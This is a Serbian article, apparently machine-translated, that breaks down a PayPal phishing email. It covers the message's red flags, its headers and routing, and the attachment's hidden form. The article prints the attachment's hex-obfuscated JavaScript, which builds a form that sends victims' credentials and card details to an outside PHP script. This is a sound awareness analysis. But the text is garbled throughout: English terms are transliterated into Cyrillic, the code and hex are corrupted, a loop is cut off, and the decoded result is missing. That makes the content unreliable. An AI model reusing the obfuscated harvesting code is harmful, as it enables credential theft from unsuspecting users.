Безбедност на мрежи Разбијање анатомије е-поште за пхисхинг

У данашњем свету где су све информације на интернету, пхисхинг је један од најпопуларнијих и најразорнијих напада на мрежи, јер увек можете очистити вирус, али ако су ваши банковни подаци украдени, ви сте у невољи. Ево слом једног таквог напада који смо примили.

Немојте мислити да су важни само ваши банковни подаци: на крају крајева, ако неко стекне контролу над пријавом на ваш рачун, они не само да знају информације садржане у том рачуну, већ су изгледи да се исте информације за пријављивање могу користити на другим рачуни. Ако компромитују ваш налог е-поште, могу да ресетују све ваше друге лозинке.

Дакле, осим што чувате јаке и различите лозинке, морате увек бити у потрази за лажним порукама које се маскирају као права ствар. Док је већина покушаја пхисхинга аматерски, неки су прилично убедљиви па је важно разумети како их препознати на површинском нивоу, као и како раде испод хаубе..

Имаге би асирап

Испитивање онога што је у обичном виду

Наш пример е-поште, као и већина покушаја пхисхинга, "обавештава" вас о активностима на вашем ПаиПал рачуну који би, у нормалним околностима, био алармантан. Позив на акцију је да потврдите / вратите свој налог тако што ћете поднети скоро сваки лични податак о коме се можете сјетити. Опет, ово је прилично формулаично.

Иако постоје изузеци, скоро свака е-маил адреса за пхисхинг и муљажа се учитава црвеним заставама директно у самој поруци. Чак и ако је текст убедљив, обично можете наћи много грешака које се појављују у целом телу поруке, што указује да порука није законита.

Тхе Мессаге Боди

На први поглед, ово је једна од бољих пхисхинг порука које сам видео. Нема правописних или граматичких грешака, а гласање се чита у складу са оним што можете очекивати. Међутим, постоји неколико црвених заставица које можете видети када прегледате садржај мало ближе.

• “Паипал” - Тачан случај је “ПаиПал” (главни П). Можете видети да се у поруци користе обе варијације. Компаније су веома промишљене са својим брендирањем, тако да је сумњиво да би тако нешто прошло процес припреме.
• "Омогућити АцтивеКс" - колико пута сте видјели легитиман бизнис базиран на величину Паипал-а који користи власничку компоненту која ради само на једном претраживачу, посебно када подржавају више претраживача? Наравно, негде тамо нека компанија то ради, али ово је црвена застава.
• "Сигурно." - Обратите пажњу на то како се ова реч не слаже са маргином са остатком текста параграфа. Чак и ако мало више растегнем прозор, он се не умотава у простор.
• "Паипал!" - Простор испред знака узвика изгледа незгодно. Само још једна хир, за коју сам сигуран да не би био у легитимној емаил поруци.
• “ПаиПал- Аццоунт Упдате Форм.пдф.хтм” - Зашто би Паипал придодао “ПДФ” посебно када би могли повезати страницу на њиховом сајту? Поред тога, зашто би покушали да прикрију ХТМЛ датотеку као ПДФ? Ово је највећа црвена застава свих њих.

Заглавље поруке

Када погледате заглавље поруке, појављује се неколико црвених заставица:

• Адреса је тест@тест.цом.
• Недостаје адреса за адресу. Нисам то испразнио, једноставно није део стандардног заглавља поруке. Обично компанија која има ваше име ће вам персонализирати е-пошту.

Прилог

Када отворим прилог, можете одмах видети да изглед није исправан јер недостаје информација о стилу. Опет, зашто би ПаиПал послао ХТМЛ образац када би вам једноставно могли дати линк на њиховом сајту?

Белешка: користили смо Гмаил-ов уграђени прегледач ХТМЛ прилога за ово, али препоручујемо да НЕ ОТВАРАТЕ прилоге од превараната. Никад. Икада. Врло често садрже нападе који ће инсталирати тројанце на ваш ПЦ да би украли информације о вашем рачуну.

Помицањем мало више можете видјети да овај образац тражи не само наше ПаиПал информације за пријаву, већ и податке о банкарству и кредитним картицама. Неке слике су покварене.

Очигледно је да овај покушај пхисхинга иде на крај са сваким напором.

Тхе Тецхницал Бреакдовн

Иако би требало да буде прилично јасно на основу онога што је очигледно да је ово покушај пхисхинга, сада ћемо да разбијемо технички изглед е-поште и видимо шта можемо да пронађемо.

Информације из прилога

Прва ствар коју треба погледати је ХТМЛ извор обрасца за привитак који је оно што шаље податке на лажни сајт.

Када брзо прегледате извор, сви линкови се појављују као они који указују на „паипал.цом“ или „паипалобјецтс.цом“ који су легитимни.

Сада ћемо погледати неке основне информације које Фирефок прикупља на страници.

Као што можете видети, неке графике су извучене из домена “блесседтобе.цом”, “гоодхеалтхпхармаци.цом” и “пиц-уплоад.де” уместо легитимних ПаиПал домена..

Информације из заглавља е-поште

Затим ћемо погледати сирове заглавља порука е-поште. Гмаил ово омогућава путем опције Прикажи оригинални мени у поруци.

Гледајући информације о заглављу за оригиналну поруку, можете видети да је ова порука састављена помоћу програма Оутлоок Екпресс 6. Сумњам да ПаиПал има некога у особљу који шаље сваку од ових порука ручно преко застарелог клијента е-поште.

Сада гледајући информације о рутирању, можемо да видимо ИП адресу пошиљаоца и сервера за слање поште.

ИП адреса корисника је оригинални пошиљалац. Брзо тражење ИП информација, можемо видјети да је ИП у Њемачкој.

А када погледамо маил сервер (маил.итак.ат), ИП адресу коју видимо је ИСП базиран у Аустрији. Сумњам да ПаиПал усмерава њихове е-поруке директно преко аустријског ИСП-а када имају масивну серверску фарму која би лако могла да се носи са овим задатком.

Где иде податак?

Тако смо јасно одредили да је ово пхисхинг е-пошта и прикупили неке информације о томе одакле је стигла порука, али шта је са вашим подацима?

Да бисмо то видели, прво морамо да сачувамо ХТМ прилог ради наше радне површине и отворимо га у уређивачу текста. Пролазећи кроз њега, изгледа да је све у реду, осим када дођемо до сумњивог Јавасцрипт блока.

Разбијајући пуни извор последњег блока Јавасцрипта, видимо:

// Цопиригхт © 2005 Воормедиа - ВВВ.ВООРМЕДИА.ЦОМ
вар и, и, к = "3ц666ф726д206е616д653д226д61696е222069643д226д61696е22206д6574686ф643д22706ф73742220616374696ф6е3д22687474703а2ф2ф7777772е646578706ф737572652е6е65742ф6262732ф646174612ф7665726966792е706870223е"; и = "; фор (и = 0; и

Кад год видите велики низ наизглед случајних слова и бројева уграђених у Јавасцрипт блок, обично је нешто сумњиво. Проматрајући код, варијабла “к” је постављена на овај велики стринг и затим декодирана у варијаблу “и”. Коначни резултат варијабле “и” се затим пише у документ као ХТМЛ.

Пошто је велики низ направљен од бројева 0-9 и слова а-ф, вероватно је кодиран преко једноставне АСЦИИ то Хек конверзије:

3ц666ф726д206е616д653д226д61696е222069643д226д61696е22206д6574686ф643д22706ф73742220616374696ф6е3д22687474703а2ф2ф7777772е646578706ф737572652е6е65742ф6262732ф646174612ф7665726966792е706870223е

Преводи на:

Није случајност да се ово декодира у валидни ХТМЛ образац који шаље резултате не у ПаиПал, већ на неваљану локацију.

Поред тога, када погледате ХТМЛ извор обрасца, видећете да овај таг формата није видљив јер се генерише динамички преко Јавасцрипт-а. Ово је паметан начин да сакријете шта ХТМЛ заиста ради ако неко једноставно погледа генерисани извор прилога (као што смо раније урадили) за разлику од отварања прилога директно у уређивачу текста.

Покрећући брзу пријаву на неисправној веб-локацији, видимо да је то домен хостован на популарном веб хосту, 1анд1.

Оно што се истиче је да домен користи читљиво име (за разлику од нечега као што је “дфх3сјхскјхв.нет”) и домен је регистрован 4 године. Због тога, верујем да је овај домен био отет и коришћен као пијун у покушају пхисхинга.

Цинизам је добра одбрана

Када је у питању безбедност на мрежи, никада не боли да имате добар цинизам.

Иако сам сигуран да има више црвених заставица у примјеру е-поште, оно што смо горе истакли су показатељи које смо видјели након само неколико минута испитивања. Хипотетички, ако је површински ниво е-маила опонашао његов легитимни пандан 100%, техничка анализа би још увек открила његову праву природу. Због тога је важно увидјети и оно што можете и не можете видјети.